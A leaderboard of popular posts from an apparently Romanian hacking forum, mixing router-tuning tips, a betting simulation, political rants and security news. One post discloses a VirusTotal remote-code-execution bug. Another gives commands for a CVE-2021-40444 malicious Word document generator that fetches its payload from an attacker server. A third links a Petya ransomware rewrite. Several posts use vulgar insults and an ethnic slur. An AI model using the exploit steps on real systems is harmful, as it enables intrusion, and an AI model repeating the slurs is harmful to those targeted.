Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 05/18/21 in all areas

  1. O vulnerabilitate pe care am descoperit-o in https://www.xoom.com/. Aplicatia este detinuta de cei de la PayPal. Este o problema mai veche. Recompensa: 5,300$
    12 points
  2. Am blocat anumite clase de IP-uri pentru acces. Va las pe voi sa va dati seama care.
    9 points
  3. Unde ai fost pe afara si cat? Aveti preturi mult mai mari decat in Germania sau Elvetia. In special in catunul de Bucuresti sau in Cluj. Oricum, toti vorbiti de bani. - De liniste nu spune nimeni ceva - De asigurare sociala sau de sanatate nu spune nimeni - De infrastructura la fel. Nu aveti strazi, nu aveti autostrazi, e totul facut in batjocura - De taxele extrem de mari nu spune nimeni nimic (nu alea din statistici, cele reale) - De preturile exorbitante nu mai spune nimeni nimic. Inclusiv alimentele sunt mult mai scumpe decat in tarile din vest. Chiriile au preturi ca in Germania si conditii de romania. In special in saracia aia de bucuresti (cel mai jegos oras vazut vreodata in europa). Ca sa nu spun de Cluj. Preturi de Geneva si conditii de inchisori rusesti. Continuati sa visati ca romania o sa ajunga vreodata o tara civilizata. Te futi in ea de tara si in parastasul ei. Voi va rezumati la IT. Rezumati-va la cineva care serveste la o terasa, care e paznic, care e vanzator. Adica din ce e formata marea pulime, nu faceti statistici pe elite si grupuri privilegiate.
    9 points
  4. After a deep security research by Cysource research team led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within VirusTotal platform and gain access to its various scans capabilities. About virustotal: The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use the CVE-2021-22204 so that these scanners would execute the payload as soon as the exiftool was executed. Technical part: The first step was uploading a djvu file to the page https://www.virustotal.com/gui/ with the payload: Virustotal.com analyzed my file and none of the antiviruses detected the payload added to the file's metadata. According to the documentation at the link: https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works , virustotal.com uses several scans. The application sent our file with the payload to several hosts to perform the scan. On virustotal hosts, at the time that exiftool is executed, according to CVE-2021-22204 inform, instead of exiftool detecting the metadata of the file it executes our payload. Handing us a reverse shell on our machine. After that we noticed that it’s not just a Google-controlled environment, but environments related to internal scanners and partners that assist in the virustotal project. In the tests it was possible to gain access to more than 50 internal hosts with high privileges. Hosts identified within the internal network: The interesting part is every time we uploaded a file with a new hash containing a new payload, virustotal forwarded the payload to other hosts. So, not just we had a RCE, but also it was forwarded by Google's servers to Google's internal network, it customers and partners. Various types of services were found within the networks, such as: mysql, Kubernetes, oracle database, http and https applications, metrics applications, SSH, etc. Due to this unauthorized access, it was possible to obtain sensitive and critical information such as: Kubernetes tokens and certificates, service settings info, source codes, Logs, etc. We reported all the findings to Google that fixed this issue quickly. Disclosure Process: Report received by GoogleVRP - 04.30.2021 GoogleVRP trigged the report - 05.19.2021 GoogleVRP accepted the report as a valid report - 21.05.2021 GoogleVRP closed the report - 04.06.2021 Virustotal was no longer vulnerable - 13.01.2022 GoogleVRP allowed publishing - 15.01.2022 Source: https://www.cysrc.com/blog/virus-total-blog
    8 points
  5. Cum n-am mai deschis un topic aici de multi ani, si am terminat serialele, si n-am somn, m-am gandit sa impartasesc cu voi optimizarile ce le folosesc pentru a imbunatati timpul de raspuns si viteza internetului. Este vorba de setari si configurari ce se aplica routerului, si este necesar ca routerul sa va permita conectarea prin ssh ca root pentru a le aplica. Eu folosesc https://www.synology.com/en-us/products/RT2600ac dar sunt convins ca ca sunt si alti producatori ce au routere cu linux destul de accesibil pentru a implementa optimizarile. Stiu nu e AX, luna viitoare scot cei de la Synology unul AX. Oricum tutorialul se aplica la fel si la AX si AC. Cand apare wifi 6e in Romania, poate fac o continuare. La routerele Synology parola setata la userul Admin, este parola de root. Valorile ce le gasiti in continuare au fost optimizate pentru o viteza maxima permisa de isp de 940Mbps, dar pana la 2.5Gbps nu ar trebui sa fie necesare modificari semnificative. De asemenea puteti aplica aceste setari si pe servere linux vor aduca imbunatatiri semnificative fata de default. 1. /etc/rc.local Este posibil sa nu functioneze configurarile exact asa cum le prezint eu aici pe routerul vostru, de aceeea inainte de a le scrie in fisiere pentru a deveni persistente, faceti setarile la run-time, si adaptatiile daca este necesar, sau omitetile daca nu se aplica la voi (nu aveti binarele respective/variabilele de kernel, ajustati caila catre ele) 2. /etc/sysctl.conf Ca sa aplicati configurarile fara reboot folositi sysctl -p, sau sysctl -w nume_variabila=valoare. Indepartati variabilele daca primiti eroare, unele pot sa lipseasca din versiunea de kernel pe care o aveti. 3. Wifi Alegem canalul: Primul pas este scanarea de spectru, sunt multe aplicatii pentru asta, scopul este sa identificati canalul cel mai putin folosit pe 2.4/5Ghz sau daca este folosit retelele ce emit pe acel canal sa aiba o putere cat mai mica. - pe 2.4Ghz sunt 3 canale ce nu se suprapun (non overlapping channels), 1, 6 si 11, ideal este sa alegem unul dintre acestea. Daca toate sunt libere, alegeti 11. - pe 5Ghz, cautam sa ne ferim de canalele cu DFS obligatoriu, astfel ne orientam catre benziile U-NII-1 si U-NII-3, daca avem noroc sa locuim in US/Canada (sau routerul crede asta), as recomanda canalul 161. Dar cum locuim in Romania si e 5000 lei amenda daca setezi alta tara si mergi pe un canal aiurea (in ideea in care avem vreo UM in apropiere, bruiem ceva, ei fac sesizare la ANCOM si ne bate ANCOM la usa, putin probabil), iar routerul nu ne lasa sa folosim 161 pe Romania, m-as uita la 40-44, daca este liber. Daca ai un router capabil, si intamplator locuiesti in Australia, routerul iti va permite 4W puterea in U-NII-3, cea mai mare din lume acceptata pe wifi, dar majoritatea routerelor suporta ±1W maxim. Channel width: Marimea canalului este importanta, cu cat este mai mare, cu atat incap mai multe date, deci avem viteza mai mare. - pe 2.4Ghz, eu merg pe width de 40Mhz - pe 5Ghz, routerul meu stie sa mearga pe un width de 80+80 Mhz, practic foloseste 2 canale, am ales un canal din U-NII-1 si unul U-NII-3 (cand locuiam in US), ambele cu un width de 80Mhz, bine si deviceurile din caza trebuie sa stie 80+80 Mhz, sau 160Mhz, cel mai probabil suporta doar 80Mhz, ceea ce e good enough oricum. Alte setari: DTIM 4 - mai mic scade viteza si timpul de raspuns, si se consuma mai multa baterie, mai mare e opusul, optimul este 4. Dar puteti face A/B testing si vedeti ce vi se potriveste mai bine. Multicast translation - on AMPDU - on EXTENDED NSS - on U-APSD - off MU-MIMO - on, ideal 4x4, dar si 2x2 ar trebui sa fie suficient. PMF support - off, apare un overhead ciudat si pare buggy, daca la voi se comporta la fel si on si off, e o idee buna sa ii dati on. La fel si WPA 3. IGMP Snooping - on Orice setare de power saving, off! Downgrade usb 3.0 device to reduce interference to 2.4 Ghz signal - on Allow auto-switch to DFS channels - off WPS - off (security) Daca routerul suporta guest, si nu folositi reteaua in mod curent, opriti guest. La criptarea retelei alegeti AES, pentru ca e hw accelerated. Alegeti pe 2.4Ghz N only, si 5Ghz AC/AX only, ca sa va asigurati ca fortati device-urile sa folosesca cele mai rapide protocoale de wifi, daca sunt device ce nu functioneza corect reveniti la o setare mai permisiva. Daca routerul suporta 802.11v aka Smart Connect, puteti, si recomand, sa folositi acelasi nume si la 2.4Ghz si la 5Ghz si routerul va negocia protocolul cel mai bun suportat de device, tinand cont si de calitatea semnalului pentru a avea cea mai buna acoperire si un plus de simplitate. + Folositi un doh dns, daca suporta routerul, sau macar un cloudflare dns, are datacenter si la otopeni si peers locale - https://1.1.1.1/dns/ . Firewall: Mtu probing se foloseste de icmp (ping), pentru a identifica valoarea optima, astfel este important sa acceptati icmp pe ipv4 si ipv6. Blocati orice port ce nu are ce cauta in afara, eu de exemplu, prefer sa folosesc un port non-default pentru vpn server, din care mai apoi sa am access la interfata routerului si alte chestii. Locatia fizica: Recomand sa identificati locul de unde, din pozitia routerului puteti vedea usile la toate camerele (sau cat mai multe), un hol, sa va asigurati ca nu sunt obstacole (pereti mai ales de beton, frigider, etc..) in jurul routerului, este ideal sa fie situat la o inaltime de 2m, prins pe perete (preferabil), daca folositi wifi cu precadere dintr-o anumita camera cautati o pozitie cat mai aproape de camera care sa respecte cele de mai sus. Daca pui routerul sub pat, de sub pat o sa ai putere maxima :))). Este adevarat ca semnalul ocoleste/trece prin obstacole doar ca fiecare obstacol scade semnificativ puterea, daca punem routerul pe jos, in mod automat va intalni semnificativ mai multe obstacole, si daca prin dreptul lui trec persoane, o sa apara spike-uri, nu ne dorim asta, de aceea inaltimea de 2m este optima. Performante obtinute: Inainte de a face aceste optimizari aveam 300-400 mbps, cu spike-uri mari. Dupa, am 650-666 pe orice device Apple mai nou de 2019 (testat cu: iPhone X, 12, MacBook Pro 16'' M1 pro/M1 max), si 800-900 Mbps pe deviceuri Apple 2017-2019 (chiar 2014) (testat cu: MacBook Pro 16'' 2014, 2019, Intel-based), au pus placi de retea mai slabe pe 5Ghz cu 2/mimo in loc de 3 cum era pana in 2019 pe device recente, probabil ca sa faca o economie de baterie/de cost de productie, naiba stie. https://support.apple.com/ro-ro/guide/deployment/dep2ac3e3b51/web Cert este ca routerul duce mai mult decat deviceurile ce le folosesc. Daca routerul este capabil AX la 2 mimo atat pe partea de router cat si de client estimez o viteza de 750-800Mbps, ceea ce e destul de bine. Update, screenshoot facut din qbittorrent, de pe un MBP M1 Pro, pe WIFI: Sper sa va fie de folos! Have fun! PS: daca am facut vreo greseala, o sa o corectez zilele urmatoare, am inceput sa scriu la 23 si e 03
    8 points
  6. Consumati curent, poluati si ucideti balenele si ursii polari. Huooo, pacatosilor 🤣
    8 points
  7. Da, e vorba de jreister de aici - https://rstforums.com/forum/profile/228593-jreister/ Nu era niciun hacker. Facuse ceva infractiuni in trecut si incerca sa-si faca si el un rost. Facea site-uri diverse pe la firme "un tânăr din Bacău, specializat în infracțiuni informatice." - muie presa si mamele lor specializate in blowjob de pseudo-ziaristi de cacat
    8 points
  8. Adevarat, intr-o zi erau 3000+ in alta 11.000+. Cred ca RST a avut "atacuri mult mai grele" si cu iptables -j DROP s-au rezolvat instant. Sa vorbeasca cu cei care se ocupa de hosting-ul emag si alte servicii de Black Friday
    7 points
  9. Maine e Defcamp, am rezervat masa in lobby:
    7 points
  10. Sunt vaccinat si nu am patit nimic. M-am vaccinat deoarece am decompilat vaccinul in IDA Pro si am vazut ce contine. Deschide un port pentru bere si ruleaza un shellcode obfuscat pentru dorinta de a bea. Din analiza statica heuristica realizata peste ARN-ul mesager putem banui ca firma Corona se afla in spatele acestui vaccin.
    7 points
  11. Eu am dezvoltat un bruteforcer cuantic care ruleaza pe blockchain si foloseste artificial intelligence ca sa obtina acces la servere de pe glob. E privat. Din fericire nu trebuie compilat, e scris in PHP.
    7 points
  12. Imi petreceam pretiosul meu timp liber pe TikTok si la un moment dat mi-a aparut un dude care zicea ca el face bani din pariuri pe cote mici. Totul frumos pana cand m-am gandit ce-ar fi daca s face eu o mica simulare in piton. Timpul zicea ceva de genul ca daca nu esti in stare sa castigi o cota de 1.20 sa te lasi de meserie, asa ca am ales asta ca reper si am construit urmatoriul scenariu: - Se porneste cu un buget de 2000 RON - Se face un singur pariu pe zi cu o cota de 1.20 si un pariu de 100 RON (excluzand taxele) - Daca bugetul ajunge sub 100 RON murim de foame Targetul este sa aflam cate zile putem sa supravietuim si care este bugetul maxim pe care l-am atins. Pentru a putea face acest lucru primul lucru care l-am facut a fost sa vad care este probabilitatea in procede de a castiga un pariu de 1.2, asa ca am gasit acest tabel: Ceea ce inseamna ca am 83.3% sanse sa castig un pariu. Plecand de la aceasta premisa am facut acest mic programel in piton. import random capital = 2000 bet_count = 0 max_capital = 0 def random_percent(): if random.randint(0,1000) <= 833: return 1 else: return 0 def bet(capital): global bet_count bet_count+=1 if random_percent() == 1: capital = capital + 20 else: capital = capital - 100 #print(capital) return capital while capital >= 100: capital = bet(capital) if capital > max_capital: max_capital = capital print("I survived " + str(bet_count) + " days and I had a maximum capital of " + str(max_capital)) Cand l-am rulat, spre neuimirea mea am realizat ca TikTokeru pierduse toti banii in aprox 16 ani jumate si cel mai mult a avut undeva la 3560 (adica un 75% profit maximum din suma initiala. I survived 6059 days and I had a maximum capital of 3560 Bineinteles, asta a fost o simulare, fiecare poate rula cate vrea el, morala povestii fiind urmatoarea: Indiferent cum invarti banii la pariuri, daca nu iti faci o simulare pe strategia ta la un moment dat sigur vei pierde toti banii. Chestiile astea pot fi explicate si matematic, din pacate nu prea mi-a placut scoala, preferam DotA sau Counter Strike, asa ca nu va pot ajuta cu asta. Codul poate fi rulat aici: https://pynative.com/online-python-code-editor-to-execute-python-code/ Daca mai aveti idei sau alte simulari, feel free to contribute!
    7 points
  13. Nu mai suntem in 2006 cand erau sms si email bombere la fiecare colt de strada. Aplicatiile care trimit SMS-uri sunt de obicei protejate de chestii de genul si, daca tot se intampla sa vina un flux mare de request-uri pentru SMS-uri, nu o sa dureze mult pana cineva o sa primeasca o alerta si o sa repare problema. De asta nu o sa vezi vreun bomber sa fie publicat pe undeva sau cineva sa se riste sa ti-l dea pe a-l lui.
    7 points
  14. De-a lungul timpului am observat foarte des intrebarea: “Cum sa incep cu domeniul security?”. Exista atat persoane la inceput de drum care isi doresc o cariera pe aceasta cale cat si persoane cu experienta in domeniul IT dornice sa inteleaga ce presupune acest domeniu. Voi incerca sa raspund acestei intrebari din perspectiva personala, oferind sugestii celor care nu stiu cu ce sa inceapa si cum sa porneasca pe acest drum.
    6 points
  15. Salut, cred ca te pripesti putin pentru o (alta?) pasiune. Tu vrei "un game evaluator asemenator cu cel al chess.com DAR MAI SMECHER". Chess.com e o companie cu peste 200 de angajati si peste 14 ani vechime! Nu e ceva ce se poate face intre un crawler de anunturi si o tema de Wordpress, pe cateva sute de euro. Inca ceva, de pe github-ul lichess: Iti trebuie dezvoltare cu programatori si testeri care sunt si pasionati/experti in sah si stiu cu ce se mananca stack-ul asta. Nu e stack-ul clasic de carpeala cu PHP si MySQL in spate. Cum am zis si mai sus, cei 200+ angajati ai companiei te pot contrazice... Nu pare un proiect care sa merite, mai ales pentru o pasiune din care nu vrei sa scoti bani. Parerea mea. Tot ce am zis mai sus presupune ca vrei ceva functional si calitativ. Daca vrei o carpeala, sunt sigur ca gasesti pe cineva pentru cateva mii de euro.
    6 points
  16. Sosoaca si HAUR. Cam ce poti schimba tara de prosti si nesimtiti? Din vina politicienilor sunt romanii asa: - Arunca chistocu pe jos - Isi lasa peturile de bere si ambalajele de mici la padure - Scuipa pe jos si sparg seminte - Sunt nesimtiti si oligofreni. Le explici ca ciuma rosie a fost si e un cancer si ei continua sa voteze psd. (aviz pensionarilor) - Vor un presedinte romulan, sa apara la capatos si maruta, sa rada cu ei - Traiesc din ajutoare sociale. E prea mica diferenta dintre salariul minim si ajutorul social - Se vaita permanent, scarpinandu-se la maciuca Fac pariu ca multi nici nu stiu ce atributii are un presedinte. Probabil multi se asteapta sa vina primaria si sa le faca curat in curte
    6 points
  17. @Dragos esti amuzant cu GDPR-ul. Nicio institutie din Romania nu respecta GDPR. Nici macar Autoritatea Națională de Supraveghere a Prelucrării Datelor cu Caracter Personal. Mai mult decat atat, au cumetrii si protejeaza tiganii care fac spam si au contracte cu institutiile statului roman ticalos si preacurvit. Tot ce se fura in mod scarbavnic in tara lui peste prajit in ulei de motor, se face cu sprijinul SRI. Aia asa, pe langa afacerile de pe aeroport si matraseniile cu bagarea pumnlului in gura diversilor operator economici pentru a facilita manarelile altora. Stiati ca intai se fac interceptari si apoi se obtin ordine judecatoresti? Dar ca intregul sistem de justitie e corupt precum curvele ce sug pula prin cabinele telefonice? Judecatorii au gramada de dosare penale facute si sunt amenintati ca intra pe rol daca nu dau verdictele dorite. 33 de ani de hotie si labageala. Bataie de joc pe banul public. Ca tot a venit vorba de comunicatii. Unde pula mea e site-ul MCSI.RO ? S-au dat 63.000 de euro unei firme cu activitatea inghetata sa puna online o pula cu urechi facuta in joomla. A stat online 4 luni, apoi au mai dat inca 30.000 de euro pentru refacerea lui. Au abandonat la scurt timp proiectul si au redirectat catre site-ul oficial din laba, comunicatii.gov.ro. Asta are certificatul SSL expirat din 21 mai 2021. Sat fara caini si curve proaste pe posturi bine platite. Aia e romania coaie. Treziti-va si plecati de acolo cat mai puteti inca. S-a intors Inchizitia
    6 points
  18. Hai în Echipa PSD
    6 points
  19. Salut! Impreuna cu echipa de robotica a scolii si inca cativa prieteni am decis sa facem un CTF. CTF-ul este destinat tuturor elevilor si studentilor din Romania care sunt pasionati sau doresc sa invete despre domeniul securitatii cibernetice intr-un mod gamificat. Avem challenge-uri unice si de diferite grade de dificultate pentru ca toata lumea sa se bucure de CTF. Mai multe detalii gasiti in postarea de pe instagram: https://www.instagram.com/p/CW0MGEwoLLn/ Site inscriere: https://abso-tech.eu/ Discord: https://discord.gg/7NuPEnfs
    6 points
  20. Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCE.md for manual reproduce steps If your generated cab is not working, try pointing out exploit.html URL to calc.cab Using First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system() python3 exploit.py generate test/calc.dll http://<SRV IP> Once you generate the malicious docx (will be at out/) you can setup the server: sudo python3 exploit.py host 80 Finally try the docx in a Windows Virtual Machine: Download Link : https://github.com/lockedbyte/CVE-2021-40444
    6 points
  21. It’s ON. Registration for DefCamp 2021 is OPEN. Hi Ionut! We live in strange times when everything we know has to be changed from one day to the next. 2020 was the year of remote and digital and we are fighting the accelerated digitalization consequences: threats and vulnerabilities left uncovered. The world needs #cybersecurity more than ever and we are happy to announce the dates and new format for DefCamp 2021. When: November 24-25, 2021 Format: Hybrid - both online and onsite in Bucharest, Romania Spread the news by telling your friends or Share it on social media but make sure you secure your seat first. We’re working to make DefCamp a legendary experience that creates plenty of opportunities to learn from and grow as an infosec specialist. That is why we have a couple of logistics to share with you: OPEN Call for papers OPEN Call for contests As a community oriented conference, we encourage knowledge sharing and collaboration, which is why we have opened DefCamp Call for Papers. Once you have a piece from the DefCamp Hacking Village, most definitely you want more excitement, more hacking, more activities but why not create your own competition? Apply with your paper! Bring your ideas to the Hacking Village! OPEN Registration - Secure your seat according to your preferences. On-site, in Bucharest - Romania Online We hope to meet some of you offline, in Bucharest to remember the good old days and to exchange knowledge or hacking in the Hacking Village for two full days. Get access to speakers, other professionals just like you and to both online and offline Hacking Village competitions. As the worldwide limitations won’t allow us to have more people under the same roof, we will open the online streaming for all of you who want to attend but cannot do so for various reasons. What is amazing is the fact that you will be able to engage also in the online Hacking Village happening on CyberEDU with this pass. Sounds amazing, doesn’t it? We will do our best (and beyond) to make sure we will enjoy another DefCamp conference edition. COVID related arrangements - make sure you check our website if you have any questions related to logistics and other information. We have a FAQ area where we explain what will happen with all the variables taken into consideration. Until we meet again in your inbox, keep an eye on all our social media channels and let’s stay safe because autumn is coming! Secure your DefCamp ticket now! See you with more news soon! The DefCamp team. Detalii: https://def.camp/
    6 points
  22. Bro, la tine deschide direct socket :))))))
    6 points
  23. Salutari ! Ma numesc Darius (prietenii imi zic r0ger/r0gerica) , am 20 de ani (vin din Bucuresti - acum stabilit in Liverpool) si m-am inscris si eu pe forum pentru domeniul de reversing cu scopul de a-mi imbunatatii indemanarile de reversing : Practic pe celealte forumuri de reverse-engineering am scris patchuri (rareori keygen-uri) pt. diferite aplicatii si le-am postat doar in scopul de a le testa . pe timp de pandemie (2020) am invatat programare mai mult in assembly/masm32 (putin in delphi/pascal si C++) dar am invatat pe parcurs si reversing. Mie cel mai mult prefer patching pentru ca e mai usor de detectat in aplicatii (mai ales in alea neprotejate , mai putin cele compresate in Asprotect/Armadillo/etc) NAG screenuri si sa scriu keygen-uri in assembly la nivel mai usor (alea care nu sunt criptate - cele criptate cu MD5/RSA/SHA-1 e putin mai complicat pe acolo). Oricum , ma bucur sa vad multi oameni pe aici care chiar sunt interesati de domeniul asta.
    6 points
  24. Have you considered that in certain situations the way hackers exploit vulnerabilities over the network can be predictable? Anyone with access to encrypted traffic can reverse the logic behind the exploit and thus obtain the same data as the exploit. Various automated tools have been analyzed and it has been found that these tools operate in an unsafe way. Various exploit databases were analyzed and we learned that some of these are written in an insecure (predictable) way. This presentation will showcase the results of the research, including examples of exploits that once executed can be harmful. The data we obtain after exploitation can be accessible to other entities without the need of decrypting the traffic. The SSL/TLS specs will not change. There is a clear reason for that and in this presentation I will argue this, but what will change for sure is the way hackers will write some of the exploits.
    6 points
  25. Daca vrei sa-i faci o farsa buna amicului tau, surprinde-l cu un blowjob.😋
    6 points
  26. Pai si bugete pentru firmele neamurilor? Ei nu cauta solutii man. Cauta sa ofere contractele si sa mulga bani
    5 points
  27. Oricum sunt inutile site-urile guvernamentale. Poti chiar spune ca sunt site-uri folosite la frauda, la cat va fura statul roman ticalos. ♥️ fratii mei rusi!
    5 points
  28. ce ne facem baieti, a picat psd.ro si inca cateva rahaturi de site-uri pe la 7 dimineata, maine poimaine o sa atace si covrigaria luca plm a sunat 1990 isi vor pachetele inapoi
    5 points
  29. Asta e curs cum sa iti ia casa foc. Nu se respecta niciun fel de normativ/standard acolo. E instalatie electrica sau lucreaza la ma-sa la grajd :)))) - Conductorii par de 1,5 mm toti - Sigurantele sunt de 16 AMPERI curba C (pentru consumatori inductivi, nu rezistivi, asa cum avem in casa la majoritatea lucrurilor). Pentru instalatiile domestice se folosesc curba A sau B. E logic, ai curba C pentru ca un consumator inductiv consuma de pana la 6 ori curentul absorbit la pornire (o sa sara siguranta aia la 60 de amperi, atunci cand toata instalatia facuta pe 1.5mm sectiune o sa arda in flacari) - Nu exista niciun fel de siguranta diferentiala - A ocupat mai mult de 70% din cutie cu ele. - Conductorii litati nu se dezizoleaza cu caterul - Este interzisa cositorirea conductorilor in instalatii electrice. Acolo se folosesc cleme speciale de tip wago (prinderea se face mecanic, altfel cositorul acela o sa curga la prima supra sarcina iar suprafata de contact este de ~0,3mm, ori de cate ori l-ar rasuci labarul) - A pus deasupra sarme intre sigurante in loc de busbar (9 sigurante de 16 amperi pe un singur conductor de 1,5mm)
    5 points
  30. Adica s-a rupt receiverul de la tastatura. Microsoft All-In-One este RF (Wireless), nicidecum Bluetooth. Nu iti va functiona cu niciun alt receiver wireless pentru ca vin special facute asa (fiecare dongle functioneaza doar cu tastatura din acel set).
    5 points
  31. Salut, Pentru ca de multe ori am avut nevoie de ajutor si aici pe forum l-am gasit dar si pentru ca in cei aproape 10 ani am invatat multe de la oameni de calitate de aici, am ales sa intorc putin favorul. De-a lungul timpului, pregatindu-ma pentru CCNA, CCNP si mai apoi pentru CCIE, am strans aproape 2TB de cursuri, video-uri, workbook-uri si cam tot ce este nevoie pentru a ma pregati pentru certificarile de mai sus. Nu stiu cum sa impart toata informatia, pentru ca este multa, asa ca am facut intr-un notepad numele fisierelor, ca sa le puteti filtra mai bine. Random YouTube Videos VPN OSPF Orhan-Ergun-Self-Paced-BGP-Training.11.1 OrhanErgun-Self-Paced CCIE Enterprise Infrastructure Training.11.1 IPexpert VOD INE CCIE R&S v5 INE CCNA-CCENT R&S 100-105 ICND1 Technologies INE CCNA R&S 200-105 ICND2 Technologies INE - CCNP R&S v2 (2015) - HQ INE - CCNP Enterprise 350-401 ENCOR INE - CCNP Enterprise 300-410 ENARSI INE - CCIE-Routing-Switching-Written-v5-1 INE - CCIE Enterprise Infrastructure V1.0 Cisco Books BGP Parola de pe Pastebin este adresa fara forums.com Pe langa toate acestea, pe care le am pe ssd-ulintern si au 953.74GB, mai am in Cloud, urmatoarele: CCNA: https://ibb.co/Q6vFqb1 CCNP: https://ibb.co/6JrvVkc CCIE: https://ibb.co/bRvxvQH Partea buna este ca nu cer nimic pe ele. Partea proasta, pentru ca tot ce este aici este strans in ani de zile, imi rezerv dreptul sa aleg cui dau aceste resurse. Daca ai trollat si ai cerut hack-uri sa spargi parole de messenger, nici nu te obosi. O seara placuta va doresc. PS: Unde nu este extensia .mp si nici .pdf, inseamna ca este folder, ceea ce inseamna ca acel folder contine alte zeci de video-uri. In total, video, pdf-uri si cursuri, sunt intr-un numar de 6996 doar pe ssd-ul intern.
    5 points
  32. Executabilul de la Petya Ransomware Rescris de la 0 in C (pentru scop educational). Totul este explicat concret si clar. SC: https://github.com/reservedcloud/Petya2 Codul sursa este licentiat cu GPL 3.0, deci orice schimbare sau publicare a sursei fara credite poate fi data jos printr-un DMCA.
    5 points
  33. Inainte de asta (MRRST - Marea Revitalizare RST), eu sunt uimit ca ai reusit sa faci o fraza de 282 cuvinte fara sa pui un punct. Mai mai sa raman fara aer cand am citit ce-ai scris.
    5 points
  34. Ba da tu te-ai gandit sa faci bani muncind? De cand sunt pe forumu asta numai cu cacaturi d-astea umbli. Ce ai in capu' ala?
    5 points
  35. Vreau si eu sa generez macar 3k dolari pe luna, asa ca hobby.
    5 points
  36. Lărgirea interceptării comunicațiilor – introdusă pe șest de Guvern Posted on: 9 December 2021 By: Bogdan Manolea Un nou articol (apărut din senin într-o lege care trebuia să reglementeze cu totul altceva) lărgește în mod nejustificat domeniul și spectrul interceptării comunicațiilor electronice, inclusiv a accesului la datele de trafic, date de conținut și la „conținutul comunicațiilor criptate tranzitate”. Articolul a fost adăugat într-un proiect de lege adoptat de Guvernul Câțu cu doar 3 zile înainte de a fi demis de Parlament, iar proiectul a trecut de Camera Deputaților fără niciun amendament contrar. I. Mega-plictis, ce să mai. Doar întâmplarea face că ne-am uitat pe un text juridico-tehnic lung de 300 de pagini pe un text relativ plictisitor, chiar și pentru juriști obișnuiți cu domeniul telecom. Proiectul de lege pentru transpunerea directivei UE 2018/1972 (Codul european al comunicațiilor), care de fapt înlocuiește alte 4 directive, este un mega-proiect legislativ care transpune măsuri în mare parte interesante doar pentru cei interesați de domeniul comunicațiilor electronice și de ce face ANCOM. Ministerul Transporturilor și Comunicațiilor a avut proiectul în dezbatere publica încă din noiembrie 2020 (inclusiv cu o întâlnire online) și a inclus în el și alte reglementari de interes pentru același domeniu (ceva clarificări legea infrastructurii, serviciul My ANCOM) și i-au mai dat și un nume generic - „Proiectul de Lege pentru modificarea și completarea unor acte normative în domeniul comunicațiilor electronice și pentru stabilirea unor măsuri de facilitare a dezvoltării rețelelor de comunicații electronice”. Mega-plictis, ce să mai. Deși directiva trebuia transpusă până pe 21 decembrie 2020, a zăcut undeva prin Guvern aproape un an până când a plecat USR din coaliție . Apoi, cu doar 3 zile înainte să fie demis (coincidență sau nu?!?), Guvernul Câțu îl adoptă dintr-o dată în ultima ședință de guvern. Pe urmă intră în circuitul parlamentar, iar la Camera Deputaților trece ca prin brânză și este adoptat pe 7 decembrie 2021. Mega-plictis, ce să mai. II. Și diavolul e în 10^2 Doar ca între varianta din dezbatere publică și cea adoptată de guvern apare o nouă adăugire în motivație numită „Schimbări legislative relevante pentru domeniul securităţii naţionale” (sic!), două definiții (scrise evident de persoane care nu au lucrat în domeniu, după formulările absolut improprii) și art 102 inserat într-o zonă care n-are nimic de a face cu subiectul celorlalte 299 de pagini: Art.10^2. — (1) Furnizorii de servicii de găzduire electronică cu resurse IP şi furnizorii de servicii de comunicaţii interpersonale care nu se bazează pe numere au obligaţia să sprijine organele de aplicare a legii şi organele cu atribuţii în domeniul securităţii naţionale, în limitele competenţelor acestora, pentru punerea în executare a metodelor de supraveghere tehnică ori a actelor de autorizare dispuse în conformitate cu dispoziţiile Legii nr. 135/2010 privind Codul de procedură penală, cu modificările şi completările ulterioare, şi ale Legii nr. 51/1991 privind securitatea naţională, republicată, cu modificările şi completările ulterioare, respectiv: a) să permită interceptarea legală a comunicaţiilor, inclusiv să suporte costurile aferente; b) să acorde accesul la conţinutul comunicaţiilor criptate tranzitate în reţelele proprii; c) să furnizeze informaţiile reţinute sau stocate referitoare la date de trafic, date de identificare a abonaţilor sau clienţilor, modalităţi de plată şi istoricul accesărilor cu momentele de timp aferente; d) să permită, în cazul furnizorilor de servicii de găzduire electronică cu resurse IP, accesul la propriile sisteme informatice, în vederea copierii sau extragerii datelor existente. (2) Obligaţiile prevăzute la alin. (1) lit. a) - c) se aplică în mod corespunzător şi furnizorilor de reţele sau servicii de comunicaţii electronice. III. Cine sunt ăștia??? Pentru cei pierduți în textul ce pare un acrostih dar nu este, sa explicăm trei termeni: „Furnizorii de servicii de găzduire electronică cu resurse IP” – sunt de fapt aceiași cu furnizorii de găzduire web (de fapt, deja reglementați în legea 365/2002), care oferă serviciile „pe teritoriul României” conform definiției nou inventate din art 4 alineatul (1), noul punct 9^5. „Serviciu de comunicații interpersonale care nu se bazează pe numere” – este ce se numea acum câțiva ani „mesagerie instatanee sau mesaje chat” și practic intra în categoria asta Skype, WhatsApp, Facebook Messanger, Signal, Wire, Telegram sau pentru cei mai nostalgici Yahoo Messanger, AIM, ICQ sau chiar IRC. Pentru o minte (sau altceva) mai creață, ar fi un serviciu de comunicații interpersonale care se integrează perfect în definiția imberbă din art 4 alineatul (1), noul punct 9^3 chiar și Chaturbate sau LiveJasmin. (ca să se clătească și ochiul lor, că să zic așa). Atenție, aceștia nu sunt doar cei care oferă serviciile „ pe teritoriul României”. (cuvânt cheie- indiciu: „tranzitat”) „Organele cu atribuţii în domeniul securităţii naţionale”- este aceiași terminologie vagă deja declarată neconstituțională în 2008 (și alte decizii). Oricum nimeni nu este în stare sa facă lista lor, cu atât mai mult cu privire la atribuțiile exacte, legea din 1991 find la fel de vagă și astăzi. IV. Ce trebuie să facă??? Aspectele legate de interceptarea legală comunicațiilor, cu toate garanțiile de rigoare (ma rog, până la noi decizii de neconstituționalitate, eu zic ca decizia din 2016 e doar prima dintr-un șir dacă nu se rezolvă niște probleme de fond) sunt prevăzute de Codul de Procedură Penală (CPP). În mod logic, dacă ar fi vreo problemă sau este nevoie de actualizarea lor s-ar face tot printr-o 